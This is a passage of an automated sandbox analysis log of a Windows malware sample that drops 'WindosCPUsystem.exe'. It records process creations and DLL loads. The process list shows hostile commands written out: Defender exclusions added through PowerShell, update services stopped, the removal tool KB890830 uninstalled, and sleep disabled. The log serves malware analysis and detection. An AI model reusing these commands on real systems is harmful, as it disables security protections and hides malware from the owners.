                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
                        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
                        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
                        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                        Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                        Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                        Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\explorer.exe explorer.exe
                        Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\EXPLORER.EXE {D4D7F2EA-38C9-468B-BF0E-B76E00A488F0}
                        Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\EXPLORER.EXE {D4D7F2EA-38C9-468B-BF0E-B76E00A488F0}
                        Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\EXPLORER.EXE {D4D7F2EA-38C9-468B-BF0E-B76E00A488F0}
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\MicrosoftWorde\WindowsServer2024.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe','C:\ProgramData'Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe"Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\MicrosoftWorde\WindowsServer2024.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe','C:\ProgramData'Jump to behavior
                        Source: C:\Windows\explorer.exeProcess created: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe "C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe" ""Jump to behavior
                        Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\EXPLORER.EXE {D4D7F2EA-38C9-468B-BF0E-B76E00A488F0}Jump to behavior
                        Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\EXPLORER.EXE {D4D7F2EA-38C9-468B-BF0E-B76E00A488F0}Jump to behavior
                        Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\EXPLORER.EXE {D4D7F2EA-38C9-468B-BF0E-B76E00A488F0}Jump to behavior
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauservJump to behavior
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bitsJump to behavior
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvcJump to behavior
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeProcess created: C:\Windows\explorer.exe explorer.exeJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: msi.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: dbghelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: dbgcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: msi.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: dbghelp.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: dbgcore.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: xmllite.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: napinsp.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: pnrpnsp.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: wshbth.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: nlaapi.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: winrnr.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: smartscreenps.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\explorer.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
                        Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
                        Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                        Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\explorer.exeSection loaded: userenv.dll
                        Source: C:\Windows\explorer.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\explorer.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
                        Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
                        Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
                        Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\explorer.exeSection loaded: mswsock.dll
                        Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\explorer.exeSection loaded: napinsp.dll
                        Source: C:\Windows\explorer.exeSection loaded: pnrpnsp.dll
                        Source: C:\Windows\explorer.exeSection loaded: wshbth.dll
                        Source: C:\Windows\explorer.exeSection loaded: nlaapi.dll
                        Source: C:\Windows\explorer.exeSection loaded: winrnr.dll
                        Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: amsi.dll
                        Source: C:\Windows\explorer.exeSection loaded: profapi.dll
                        Source: C:\Windows\explorer.exeSection loaded: msasn1.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
